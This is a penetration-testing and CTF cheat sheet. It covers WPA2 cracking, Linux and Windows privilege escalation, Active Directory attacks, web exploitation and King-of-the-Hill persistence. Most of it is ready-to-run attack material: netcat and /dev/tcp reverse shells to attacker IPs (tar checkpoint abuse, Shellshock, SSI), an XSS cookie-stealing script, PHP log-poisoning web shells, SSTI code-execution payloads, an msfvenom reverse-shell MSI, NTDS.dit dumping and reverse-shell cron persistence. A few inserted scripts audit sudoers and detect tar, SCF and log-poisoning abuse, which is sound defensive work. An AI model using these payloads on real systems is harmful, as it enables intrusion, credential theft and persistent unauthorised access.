# Wireless
To start with WPA2 cracking make sure that your network interface is in monitor mode<br />
```
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
```
Then run airmon-ng<br />
```
airmon-ng check kill
airmon-ng start wlan0
```
To sniff for APs (access points)<br />
`airodump-ng wlan0`
To start capturing traffic for a specific AP we pass the channel number with `-c` and the MAC address with `--bssid`<br />
`airodump-ng -c CHANNEL_NUMBER --bssid MAC_ADDRESS wlan0`<br />
To capture the 4-way handshake we run the same command with `-w` so that the capture file is saved<br />
`airodump-ng -c CHANNEL_NUMBER --bssid MAC_ADDRESS -w FILENAME wlan0`<br />
Keep this running and launch the deauthentication attack on the AP against a specific client; you can also do this to deauth all clients/hosts on the AP<br />
`aireplay-ng -0 0 -a MAC_ADDRESS -c CLIENT_MAC wlan0`<br />
When the client reconnects, airodump-ng captures the handshake. To crack the password we use aircrack-ng<br />
`aircrack-ng FILENAME.cap -w path/to/wordlist`
When the password is cracked you can put the network interface back into managed mode<br />
`sudo systemctl restart NetworkManager.service`
# Linux
### Stabilize Shell
1. ctrl+z
2. stty raw -echo
3. fg (press enter x2)
4. export TERM=xterm, so that `clear` and other terminal commands work
### Ping for devices on LAN
1. `netdiscover -i <interface>`
2. `arp-scan -l`
3. `fping -a -g <ip>/24`
4. `nmap -n -sP <ip>/24`
5. `for i in $(seq 1 254); do ping -c1 -t 1 192.168.168.$i; done`
### Spawn bash
* /usr/bin/script -qc /bin/bash /dev/null
* python -c 'import pty;pty.spawn("/bin/bash")'
* python3 -c 'import pty;pty.spawn("/bin/bash")'
### Vulnerable sudo (ALL,!root)
`sudo -u#-1 whoami`<br />
`sudo -u#-1 <path_of_executable_as_other_user>`
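A defender-side check for this rule shape, added here as an example (not from the original notes): it scans a sudoers file for runas lists that grant `ALL` but exclude only `root` by name, which is what `sudo -u#-1` abuses. Function names and the sudoers sample are mine and constructed.

```shell
#!/bin/bash
# Added example, not part of the original notes: audit sudoers text for the
# "(ALL, !root)" runas pattern that the `sudo -u#-1` trick above abuses.
# Matching is textual only: it flags rules to review, it does not prove they
# are exploitable (that also depends on the installed sudo version).

# Print "line:rule" for every active (non-comment) rule whose runas list
# grants ALL and then excludes root by name, e.g. "bob ALL=(ALL, !root) /bin/bash".
find_negated_root_rules() {
    local sudoers_file="$1"
    grep -En '^[^#]*=[[:space:]]*\([^)]*ALL[^)]*,[[:space:]]*!root[^)]*\)' "$sudoers_file" || true
}

# Number of flagged rules; 0 means there is nothing to review.
count_negated_root_rules() {
    find_negated_root_rules "$1" | grep -c . || true
}

# Write a constructed sudoers sample (not a real file) and print its path.
make_sample_sudoers() {
    local sample
    sample="$(mktemp)"
    cat > "$sample" <<'EOF'
# constructed sample for the demonstration, not a real sudoers file
Defaults env_reset
root    ALL=(ALL:ALL) ALL
# the risky shape: "anyone except root", where root is excluded only by name
bob     ALL=(ALL, !root) /bin/bash
alice   ALL=(ALL,!root) NOPASSWD: /usr/bin/vim
carol   ALL=(www-data) /usr/bin/php
EOF
    printf '%s\n' "$sample"
}

main() {
    local sample
    sample="$(make_sample_sudoers)"
    echo "Rules to review in $sample:"
    find_negated_root_rules "$sample"
    echo "Flagged: $(count_negated_root_rules "$sample")"
    rm -f "$sample"
}

main
```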
### Execute as different user
`sudo -u <user> <command>`
### FTP
Connect to the FTP service on the machine (enter the username and password at the prompt)<br />
`ftp <ip>`
After logging in successfully you can download all files with
`mget *`
Download files recursively<br />
`wget -r ftp://user:pass@<ip>/`
### SMB Shares
#### SmbClient
* `smbclient -L \\\\<ip>\\` listing all shares
* `smbclient \\\\<ip>\\<share>` accessing a share anonymously
* `smbclient \\\\<ip>\\<share> -U <user>` accessing a share as an authorized user
#### Smbmap
* `smbmap -u <username> -p <password> -H <ip>`
#### Smbget
* `smbget -R smb://<ip>/<share>`
### NFS shares
* `showmount -e <ip>` lists the NFS shares
* `mount -t nfs <ip>:/<share_name> <directory_where_to_mount>` mounts that share
### Cronjobs
* cronjobs for specific users are stored in `/var/spool/cron/crontabs/`
* `crontab -u <user> -e` check cronjobs for a specific user
* `crontab -l` cronjobs for the current user
* `cat /etc/crontab` system wide cronjobs
### Finding Binaries
* `find . -perm /4000` (SUID, set-user-id binaries)
* `find . -perm /2000` (SGID, set-group-id binaries)
### Finding File capabilities
`getcap -r / 2>/dev/null`
### Finding text in files
`grep -rnw '/path/to/somewhere/' -e 'pattern'`
### Changing file attributes
chattr +i filename `making file immutable`<br />
chattr -i filename `making file mutable`<br />
lsattr filename `checking file attributes`
### Uploading Files
scp file/you/want user@ip:/path/to/store<br />
python -m SimpleHTTPServer [port] `by default listens on 8000`<br />
python3 -m http.server [port] `by default listens on 8000`<br />
### Downloading Files
`wget http://<ip>:port/<file>`
### Download files using only bash
Uses bash's built-in `/dev/tcp` so it works on a host without wget or curl; call it as `download http://host:port/path > outfile`
```bash
#!/bin/bash
download() {
    # split "http://host:port/path" into protocol, host[:port] and the rest
    read proto server path <<< "${1//\// }"
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    # no ":port" in the URL leaves HOST and PORT identical, so default to 80
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
    # open a read/write TCP connection on file descriptor 3
    exec 3<>/dev/tcp/${HOST}/$PORT
    # send request
    echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
    # read the header, it ends in an empty line (just CRLF)
    while IFS= read -r line ; do
        [[ "$line" == $'\r' ]] && break
    done <&3
    # read the data (binary safe: split on NUL and re-insert it on output)
    nul='\0'
    while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
        printf "%s$nul" "$x"
    done <&3
    exec 3>&-
}
```
### Netcat to download files from target
`nc -l -p [port] > file` receive file<br />
`nc -w 3 [ip] [port] < file` send file<br />
### Cracking Zip Archive
`fcrackzip -u -D -p <path_to_wordlist> <archive.zip>`
### Decrypting PGP key
If you have an `asc` key which can be used for PGP authentication, convert it to a john hash and crack the passphrase
* gpg2john key.asc > asc_hash
* john asc_hash --wordlist=path_to_wordlist
#### With the pgp CLI
* pgp --import key.asc
* pgp --decrypt file.pgp
#### With the gpg CLI
* gpg --import key.asc
* gpg --decrypt file.pgp
### Killing a running job in the same shell
Find its job number with `jobs`, then kill it by that number
```
$ jobs
[1]+ Running sleep 100 &
$ kill %1
[1]+ Terminated sleep 100
```
### SSH Port Forwarding
`ssh -L <local_port>:localhost:<blocked_port> <username>@<ip>`
### SSH Dynamic Port Forwarding
`ssh username@ip -i id_rsa(optional) -D 1337`
### Port Forwarding using chisel
On attacker machine `./chisel_1.7.6_linux_amd64 server -p <port to listen> --reverse`<br />
On target machine `./chisel client <attacker>:<attacker_listening_port> R:localhost:<port to forward from target>`
### SSH auth log poisoning
Log in as any user to confirm that the attempt gets written to the auth log, then log in with a username containing PHP code
`ssh '<?php system($_GET["a"]); ?>'@192.168.43.2`
Then `http://ip/page?a=whoami;`
## SMTP
Using `VRFY` we can check which email addresses are valid, or we can try to send an email and verify through `RCPT TO:email`<br />
To send an email with an attachment we can use `swaks`
```bash
swaks --server IP -f from@arz.com -t to@arz.com --attach file.rtf
```
https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
### Screen
If there's a detached screen session running as root, we can reattach it only if the screen binary has the SUID bit `screen -r root/`
### Getting root with ln (symlink)
If we have permission to run /usr/bin/ln as root we can own the machine
```
echo 'bash' > /tmp/root
chmod +x /tmp/root
sudo /usr/bin/ln -sf /tmp/root /usr/bin/ln
sudo /usr/bin/ln
```
### Escaping restricted Shell (rbash)
#### Using vi editor
```
:set shell=/bin/sh
:shell
```
Then set the PATH variable
`export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin`
#### Using -t 'bash --noprofile'
When logging in with ssh we can use `-t` to force pseudo-tty allocation and run `bash --noprofile`, then change the PATH and SHELL variables
### Tar Exploitation
Whenever you see a cronjob running a command like `cd /<user>/andre/backup && tar -zcf /<folder>/filetar.gz *`, go to the folder the backup is created from and run these commands in that directory; the shell expands `*` into the file names and tar parses names starting with `-` as options<br />
```
echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0< /tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```
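The defensive side of this, added here as an example (not from the original notes): a pre-flight check that reports option-like file names in a backup directory, and a tar invocation that never turns file names into options. Function names are mine; the sample files are constructed in a temporary directory.

```shell
#!/bin/bash
# Added example, not part of the original notes. The cron job above is abusable
# because the shell expands "*" into file names and tar then parses names that
# begin with "-" as options. Two defensive pieces: a pre-flight check that
# reports such names, and a backup invocation that never turns names into
# options. Sample files are constructed inside a temporary directory.

# Print the name of every entry directly inside a directory that begins with "-".
find_option_like_names() {
    local dir="$1" entry
    for entry in "$dir"/-*; do
        # an unmatched glob stays literal, so check the entry really exists
        if [ -e "$entry" ]; then
            printf '%s\n' "${entry##*/}"
        fi
    done
}

# Archive a directory with -C and "." instead of a shell glob: tar receives a
# fixed argument list, so "--checkpoint=1" is just another file to store.
safe_backup() {
    local dir="$1" out="$2"
    tar -zcf "$out" -C "$dir" .
}

# List the archive members, to confirm what actually got stored.
archive_members() {
    tar -tzf "$1" | sort
}

demo() {
    local work
    work="$(mktemp -d)"
    mkdir "$work/backup"
    echo "data" > "$work/backup/notes.txt"
    # constructed: the same file names the snippet above plants in the directory
    touch "$work/backup/--checkpoint=1" "$work/backup/--checkpoint-action=exec=sh shell.sh"
    echo "Option-like names in $work/backup:"
    find_option_like_names "$work/backup"
    safe_backup "$work/backup" "$work/filetar.gz"
    echo "Archive members:"
    archive_members "$work/filetar.gz"
    rm -rf "$work"
}

demo
```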
### Binary Exploits
If a binary runs a command by its bare name, for example `date`, we can create our own `date` that runs `/bin/bash` and prepend its directory to PATH so ours gets executed<br />
`export PATH=<path_where_binary_is>/:$PATH`
### Shared Library (LD_PRELOAD)
https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/
### MariaDB Command Execution
https://packetstormsecurity.com/files/162177/MariaDB-10.2-Command-Execution.html
### VNC
If port 5901 or 5900 is open it's likely VNC; if you see a `.remote_secret` or `.secret` file it's the password for connecting to VNC
`vncviewer -passwd remote_secret <ip>::<port>`
#### Decrypting vnc password
We can also decrypt the VNC password using `https://github.com/jeroennijhof/vncpwd`
`./vncpwd remote_secret`
### Enumeration
* cat /etc/*release
* cat /etc/issue
* uname -a
* lsb_release -a
* Running Linpeas
* ss -tulpn (for ports that are open on the machine)
* netstat -tulpn
* ps -ef --forest
# Windows
### Adding User
net user "USER_NAME" "PASS" /add
### Changing User's password
net user "USER_NAME" "NEWPASS"
### Adding User to Administrators
net localgroup administrators "USER_NAME" /add
### Changing File Permissions
CACLS files /e /p {USERNAME}:{PERMISSION}<br />
Permissions:<br />
1. R `Read`<br />
2. W `Write`<br />
3. C `Change`<br />
4. F `Full Control`
### Set File bits
attrib +r filename `add read only bit`<br />
attrib -r filename `remove read only bit`<br />
attrib +h filename `add hidden bit`<br />
attrib -h filename `remove hidden bit`
### Show hidden file/folder
dir /a `show all hidden files & folders`<br />
dir /a:d `show only hidden folders`<br />
dir /a:h `show only hidden files`<br />
### Downloading Files
`certutil.exe -urlcache -f http://<ip>:<port>/<file> output.exe`<br />
`powershell -c "wget http://<ip>:<port>/<file> -OutFile output.exe"`<br />
`powershell Invoke-WebRequest -Uri $ip -OutFile $filepath`
## Enumeration
* Running `winPEAS.exe` on the machine
* Running `PowerUp.ps1` (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc), documentation https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/ : `. .\PowerUp.ps1` then `Invoke-AllChecks`
## AlwaysInstallElevated
If `reg query HKLM\Software\Policies\Microsoft\Windows\Installer` shows the `AlwaysInstallElevated` value set to 1 (the same value under HKCU must also be 1) it means that we can install any windows installer package as SYSTEM
So to exploit this generate a windows payload<br />
`msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi > shell.msi`<br />
Start a netcat listener<br />
Transfer and run this on the target machine<br />
`msiexec /quiet /qn /i shell.msi`<br />
Alternatively this can be done with metasploit's post exploitation module
`exploit/windows/local/always_install_elevated`
## List Drives
`wmic logicaldisk get caption`
## Decrypting PSCredential Object
* $file = Import-Clixml -Path <path_to_file>
* $file.GetNetworkCredential().username
* $file.GetNetworkCredential().password
### Evil-winrm
`evil-winrm -i 10.10.213.169 -u <USER> -p '<PASS>'`
### Psexec.py
`python psexec.py DOMAIN/USER:PASS@IP`
### Forced Authentication (Stealing NTLMv2)
https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication
### Crackmapexec
#### Bruteforce Usernames using RID (Objects in AD)
`crackmapexec smb <IP> -u 'Anonymous' -p ' ' --rid-brute`
### Privilege Escalation using SeImpersonatePrivilege
If this privilege is enabled we can upload `PrintSpoofer.exe` to a directory where we have write rights and run
`PrintSpoofer.exe -i -c powershell.exe`
### Becoming NT AUTHORITY\SYSTEM (if the user is in the local administrators group)
If the system has `PsExec.exe`, open an elevated cmd and run
`.\PsExec.exe -i -s cmd.exe`
### Forced authentication (Stealing Hashes)
If we have access to upload files, we can upload an SCF (Shell Command File) in which we specify our IP and share, so that when a client renders the folder it requests the icon and authenticates to our share with its credentials
```
[Shell]
Command=2
IconFile=\\IP\share\test.ico
[Taskbar]
Command=ToggleDesktop
```
Then launch responder to capture the NTLMv2 hash
`responder -i tun0`
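A detection for this lure on the defending side, added here as an example (not from the original notes): it scans a share for `.scf` files whose `IconFile` points at a UNC path and reports the ones whose host is not in an allow-list of known file servers. Function names, the allow-list and the SCF samples are mine and constructed.

```shell
#!/bin/bash
# Added example, not part of the original notes: scan a file share for SCF
# files whose IconFile points at a UNC path, the lure described above. Any
# host in that list that is not one of your own file servers deserves a look.
# The SCF content used in the demonstration is constructed.

# Print "path<TAB>host" for each .scf file under a directory whose IconFile
# line references a UNC path (\\host\share\...).
find_unc_iconfile_scf() {
    local dir="$1" f host
    find "$dir" -type f -iname '*.scf' -print0 | while IFS= read -r -d '' f; do
        # strip CR (SCF files are usually CRLF), keep the host between the leading \\ and the next \
        host="$(tr -d '\r' < "$f" | sed -nE 's/^IconFile=\\\\([^\\]+)\\.*/\1/Ip' | head -n1)"
        if [ -n "$host" ]; then
            printf '%s\t%s\n' "$f" "$host"
        fi
    done
}

# Return 0 if the given host is in the allow-list of known file servers.
is_known_file_server() {
    local host="$1" known
    for known in "${KNOWN_FILE_SERVERS[@]}"; do
        [ "$host" = "$known" ] && return 0
    done
    return 1
}

# Print only the SCF hits that point somewhere other than a known server.
find_suspicious_scf() {
    local path host
    find_unc_iconfile_scf "$1" | while IFS=$'\t' read -r path host; do
        if ! is_known_file_server "$host"; then
            printf '%s\t%s\n' "$path" "$host"
        fi
    done
}

# Constructed allow-list; replace with your real file server names/addresses.
KNOWN_FILE_SERVERS=("fileserver01" "10.0.0.10")

demo() {
    local share
    share="$(mktemp -d)"
    # constructed lure, same shape as the SCF above, pointing at an unknown host
    printf '[Shell]\r\nCommand=2\r\nIconFile=\\\\10.0.0.99\\share\\test.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n' > "$share/report.scf"
    # constructed benign SCF pointing at a known server
    printf '[Shell]\r\nCommand=2\r\nIconFile=\\\\fileserver01\\icons\\ok.ico\r\n' > "$share/ok.scf"
    echo "Suspicious SCF files under $share:"
    find_suspicious_scf "$share"
    rm -rf "$share"
}

demo
```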
## Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed<br />
`. .\PowerView.ps1` import the PowerView module
### Query Users through LDAP
`windapsearch -d 'domain.local' --dc IP -m users`
## Gaining Information about AD with BloodHound
### Using the BloodHound Ingestor
```
python3 bloodhound.py -d 'DOMAIN_NAME' -u 'VALID_USERNAME' -p 'VALID_PASSWORD' -gc 'HOSTNAME.DOMAIN' -c all -ns IP
```
Import the json files in the BloodHound GUI<br />
### Using SharpHound
* Upload `SharpHound.ps1` (https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)
* Then `. .\SharpHound.ps1`
* `Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN-NAME -ZipFileName loot.zip` The domain name can be found by running `Get-ADDomain` and looking at the result
* This command produces an archive which you simply drag and drop onto the BloodHound GUI running on your local machine, then run queries for kerberoastable accounts or other information
## Kerberoasting Attack
### Using Impacket GetNPUsers.py
If we see a kerberoastable service account through BloodHound we can get that account's hash through this impacket script (GetNPUsers.py requests AS-REP hashes of accounts without Kerberos pre-authentication; for SPN-based kerberoasting the impacket script is GetUserSPNs.py)<br />
```
python3 GetNPUsers.py DOMAIN/USERNAME:PASSWORD -dc-ip IP -request
```
### Using Rubeus
* Download rubeus `https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe`
* Documentation `https://github.com/GhostPack/Rubeus`
* Transfer Rubeus.exe to the targeted windows machine and run `.\Rubeus.exe kerberoast /outfile:C:\temp\hash.txt` to get a hash
## Dumping NTDS.dit
If we find a user with DCSync rights (the DS-Replication-Get-Changes-All privilege, i.e. the right to replicate AD secrets) we can dump NTDS.dit<br />
```
python3 secretsdump.py 'DOMAIN/USERNAME':'PASSWORD'@IP -just-dc-ntlm
```
### Abusing Constrained/Unconstrained Delegations
https://cheatsheet.haax.fr/windows-systems/privilege-escalation/delegations/
https://github.com/dirkjanm/krbrelayx
# FreeBSD
### Enumeration
* The path for binaries is `/usr/local/bin`
### Reverse Shell
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc <ip> <port> > /tmp/f`
# Msfvenom
### List All Payloads
msfvenom -l payloads
### List Payload Formats
msfvenom --list formats
# Meterpreter
### Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
### Pivoting
`use post/multi/manage/autoroute`
Example: you are on a host with IP 172.18.0.1
`set SUBNET 172.18.0.0`
`set SESSION <session_number>`
`run`
### Using socks4a proxy
`use auxiliary/server/socks_proxy`
`set VERSION 4a`
`exploit`
By default `SRVPORT` is set to 1080; if you change it, update the port in `/etc/proxychains.conf` to match
### Port scan
`use auxiliary/scanner/portscan/tcp`
`set RHOSTS <subnet>/24`
### Port Forwarding
`portfwd add -l <local_port_to_listen> -p <remote_port> -r <targeted_ip>`
### MSSQL Code Execution
Using `use admin/mssql/mssql_exec` we can execute code by specifying the credentials<br />
Using `sqsh -S IP -U <username> -P <password>` then `EXEC master..xp_cmdshell 'whoami'`
# Git
### Dumping repository
`./gitdumper.sh <location_of_remote_or_local_repository_having_.git> <destination_folder>`
### Extracting information from repository
`./extractor.sh <folder_having_.git> <extract_to_a_folder>`
# Web
### Make sure to check for backup files
If you come across a php file, look for a `.bak` as well, i.e. `config.php.bak`
### 403 Bypass
https://github.com/intrudir/403fuzzer<br />
`python3 403fuzzer.py -hc 403 -u http://<ip>/page_that_you_want_to_bypass` (the page usually returns 403 Forbidden)
### Cgi-bin
If we find a `cgi-bin` directory on the web server it's good to fuzz for files in that directory; if we find one we can abuse the Shellshock vulnerability to run bash commands on the web server through that script<br />
#### Manually
```bash
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/PORT 0>&1' http://REMOTE_IP/cgi-bin/file
```
#### Using Metasploit
`use multi/http/apache_mod_cgi_bash_env_exec`
### Symfony / Frontend server rule bypass
If we don't have access to an endpoint, for example an admin panel, we can request `/` instead and put the blocked path in either the `X-Original-URL` or `X-Rewrite-Url` header
https://githubmemory.com/repo/sting8k/BurpSuite_403Bypasser/issues/4
### XSS to RCE
```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
```
### LFI/RFI
Try to read local files like log files, the apache virtual host configuration file and source code on the target machine<br />
Virtual hosts file: `/etc/apache2/sites-available/000-default.conf`<br />
If we can read log files, we can poison them to get RCE<br />
#### For Apache2
For apache try to access `/var/log/apache2/access.log`; if we can, add `<?php system($_GET['c']); ?>` in the User-Agent<br />
#### For Nginx
For nginx try to access `/var/log/nginx/error.log`; if we can, add `<?php system($_GET['c']); ?>` in the User-Agent or in a request parameter, making sure it's not being URL encoded<br />
Also check `/etc/nginx/sites-available/default`
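A detector for the log poisoning described here and in the SSH auth log section above, added as an example (not from the original notes): both variants plant a PHP open tag in a log through an attacker-controlled field, so one check over the log lines catches either. Function names and the sample log lines are mine and constructed.

```shell
#!/bin/bash
# Added example, not part of the original notes: a detector for the log
# poisoning technique used in the SSH auth log and LFI sections. Both variants
# write a PHP open tag into a log through an attacker-controlled field (SSH
# username, HTTP User-Agent or request parameter), so one check over the log
# lines catches either. The log lines below are constructed, not real captures.

# Print "file:line:content" for every log line that contains a PHP open tag,
# including the URL-encoded form (%3C%3Fphp) that naive filters miss.
find_php_tags_in_logs() {
    grep -HnEi '<\?(php|=)|%3c%3f(php|%3d)' "$@" || true
}

# Count of poisoned lines across the given log files.
count_php_tags_in_logs() {
    find_php_tags_in_logs "$@" | grep -c . || true
}

# Write constructed auth.log and access.log samples into a directory.
make_sample_logs() {
    local dir="$1"
    cat > "$dir/auth.log" <<'EOF'
Jan  8 21:05:01 web sshd[1201]: Failed password for bob from 10.0.0.5 port 51234 ssh2
Jan  8 21:05:33 web sshd[1207]: Invalid user <?php system($_GET['a']); ?> from 10.0.0.5 port 51240
Jan  8 21:06:02 web sshd[1212]: Accepted publickey for alice from 10.0.0.7 port 51301 ssh2
EOF
    cat > "$dir/access.log" <<'EOF'
10.0.0.5 - - [08/Jan/2021:21:10:11 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [08/Jan/2021:21:10:19 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "<?php system($_GET['c']); ?>"
10.0.0.5 - - [08/Jan/2021:21:10:25 +0000] "GET /page?x=%3C%3Fphp+phpinfo()%3B+%3F%3E HTTP/1.1" 200 88 "-" "curl/7.74.0"
EOF
}

main() {
    local dir
    dir="$(mktemp -d)"
    make_sample_logs "$dir"
    echo "Poisoned log lines:"
    find_php_tags_in_logs "$dir/auth.log" "$dir/access.log"
    echo "Total: $(count_php_tags_in_logs "$dir/auth.log" "$dir/access.log")"
    rm -rf "$dir"
}

main
```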
#### Proc
To see the list of processes running on the system we can read `/proc/sched_debug`
### XXE - XInclude Attack
We can use XInclude when SOAP is being used in an application and we can't introduce a DTD, so we replace the value of a parameter with<br />
```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>
```
### XXE - Apache Batik Library
https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/
### SSI (Server Side Includes)
`echo '<!--#exec cmd="nc -e /bin/bash IP PORT" -->' > backdoor.shtml`
### SSTI (Server Side Template Injection)
#### Jinja2
To check if it's Jinja, test `{{7*'7'}}`; this would return 7777
Check for `{{4*4}}` on the url `http://IP/{{4*4}}`; if it returns "16" as a result it is vulnerable to SSTI<br />
`{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}`<br />
**Exploit**<br />
`{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}`
### SSTI WAF Bypass
- https://chowdera.com/2020/12/20201221231521371q.html
- https://www.fatalerrors.org/a/0dhx1Dk.html
- https://hackmd.io/@Chivato/HyWsJ31dI
### XSS Session Hijacking
Host this php file on your machine<br />
```php
<?php
header('Location: http://domain');
if (isset($_GET["c"]))
{
    $cookies = base64_decode(urldecode($_GET["c"]));
    $file = fopen('log.txt', 'a');
    fwrite($file, $cookies . "\n\n");
    fclose($file);
}
?>
```
Run this script where you find the web application is vulnerable to XSS
`<script>document.location='http://<ip>/cookie.php?c='+encodeURIComponent(btoa(document.cookie));</script>`
Alternatively use this<br />
https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md<br />
### SQL Map
`sqlmap -r request.txt --dbms=mysql --dump`
### Wfuzz
`wfuzz -c -z file,wordlist.txt --hh=0 http://<ip>/<path>/?date=FUZZ`
If we want to use two payloads in the same request
`wfuzz -c -w path/to/first/wordlist -w /path/to/second/wordlist -u http://ip/FUZZ/FUZ2Z`<br />
Here FUZ2Z tells wfuzz to use the second wordlist; this goes up to FUZnZ (where n is the number of the wordlist we specify)
### API (Application Programming Interface)
* Check for the possibility that there is a v1; it is likely to be vulnerable to LFI
* Use wfuzz, which is a tool to fuzz for API endpoints or for parameters
`wfuzz -u http://<ip>:<port>/<api-endpoint>\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404`<br />
Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_history`: "?" comes before the parameter, FUZZ tells wfuzz to find a parameter name, and `.bash_history` is the example value we are looking for
### Web Shell Bash
`bash -c "<bash_rev_shell>"`
### Cacti
This is a remote code execution exploit for cacti 1.2.8<br />
https://zerontek.blogspot.com/2020/10/hacking-walkthrough-cacti-128-ubuntu.html
### Wordpress
Using wpscan we can find users or do some further enumeration of the wordpress version
* `wpscan --url http://<ip>/wordpress -e u` Enumerate Users
* `wpscan --url http://<ip>/wordpress -e ap --plugins-detection aggressive` Enumerate All plugins
#### To bruteforce passwords
* `wpscan --url <ip> -U user_file_path -P password_file_path`
After logging into the wordpress dashboard, we can edit the theme's 404.php page with a php reverse shell
`http://<ip>/wordpress/wp-content/themes/twentytwenty/404.php`
#### To list which plugins are being used
`nmap -p 80 --script http-wordpress-enum --script-args search-limit=3000 10.10.11.125 -vv`
#### To get RCE
* Go to `Appearance` -> `Editor`, select the 404.php template of the current theme and paste a php reverse shell.
* Then navigate to `http://ip/wp-content/themes/twentyfifteen/404.php` (the theme name can be twentytwenty for the latest one)
#### Manual Enumeration
https://www.armourinfosec.com/wordpress-enumeration/
### Node JS
#### Prototype Pollution
##### PUG
```
{
"key": "value",
"__proto__.block":
{
"type": "Text",
"line": "test;return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
"val": "THIS IS THE VALUE"
}
}
```
### JWT
#### JKU
https://blog.pentesteracademy.com/hacking-jwt-tokens-jku-claim-misuse-2e732109ac1c
### Apache Tomcat
If we have access to /manager/html, we can upload a WAR payload (arz.war) and access it through http://ip/arz
#### Apache Tomcat used with nginx
If nginx is being used as a reverse proxy to Apache Tomcat we can abuse it through path traversal via reverse proxy mapping
https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
# Wordlists
### Directory Bruteforcing
* /usr/share/wordlists/dirb/big.txt
* /usr/share/wordlists/dirb/common.txt
* /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
### Gobuster
* `gobuster dir -u http://<ip>/ -w <path_to_wordlist>`
* `gobuster dir -u http://<ip>/ -w <path_to_wordlist> -s "204,301,302,307,401,403"` (use status codes if the web server is configured to respond 200 to every GET request)
### Feroxbuster
`feroxbuster -u http://<ip>/ -w <path_to_wordlist>`
### Dirsearch
`python3 dirsearch.py -u http://<ip>/ -w <path_to_wordlist>`
### Credential Bruteforcing
* /usr/share/wordlists/rockyou.txt
* /usr/share/wordlists/fasttrack.txt
* using `crackstation`
* using `seclists`
### Hydra
When the login shows an error message<br />
`hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form '/login.php:username=^USER^&password=^PASS^:F=Incorrect!' -t 64 -V -I`
When the login doesn't show an error message we can specify a `success (S)` string which is shown after we log in to the site, typically "logout"<br />
`hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form '/login.php:username=^USER^&password=^PASS^:S=logout' -t 64 -V -I`
# Hash Cracking
### Hashcat
* If you have a salted hash and you know the salt, crack it as `hash:salt`
# Generating Wordlists for directory brute force
### Cewl
This spiders the given url, finds keywords and makes a wordlist from its findings<br />
`cewl.rb <ip>`
### Crunch
If we want to generate a password list of length 7 starting with "milo" and ending with a 3 digit number: `%` stands for numbers, `@` for lowercase letters, `,` for uppercase letters and `^` for special characters
`crunch 7 7 0123456789 -t milo%%% -o password.txt`
# DNS
### Finding Subdomains
`wfuzz -c -w <path_to_wordlist> -u 'http://domain.com' -H "Host: FUZZ.domain.com"`
### Zone Transfer
If port 53 is open on the machine you could try a zone transfer to get information about DNS records
`dig axfr @<ip> <domain_name>`
# King Of The Hill (KoTH)
### Monitoring and Closing Shells (Linux)
* strace `debugging / tampering with processes`
* gdb `c/c++ debugger`
* script - records terminal activity
* w / who `check current pts, terminal device`
* ps -t pts/<pts-number> `process monitoring`
* script /dev/pts/<pts-number> `monitor terminal`
* cat /dev/urandom > /dev/pts/<pts-number> 2>/dev/null `prints arbitrary text on the terminal`
* pkill -9 -t pts/<pts-number>
* Add this in root's crontab (crontab -e)<br />
```
*/1 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/2222 0>&1'
```
Or you can add it in the system wide crontab (nano /etc/crontab)
```
*/1 * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/2222 0>&1'
```
### Change SSH port
`nano /etc/ssh/sshd_config` (change Port 22 to any port you want; you can also tinker with the rest of the configuration file)
`service sshd restart` (restart the SSH service to apply changes)
### Hide yourself from "w" or "who"
`ssh user@ip -T` This -T has some limitations, e.g. you cannot run bash and some other interactive commands, but it is helpful.
### Run Bash script on king.txt
`while [ 1 ]; do /root/chattr -i king.txt; done &`
### Send messages to logged in users
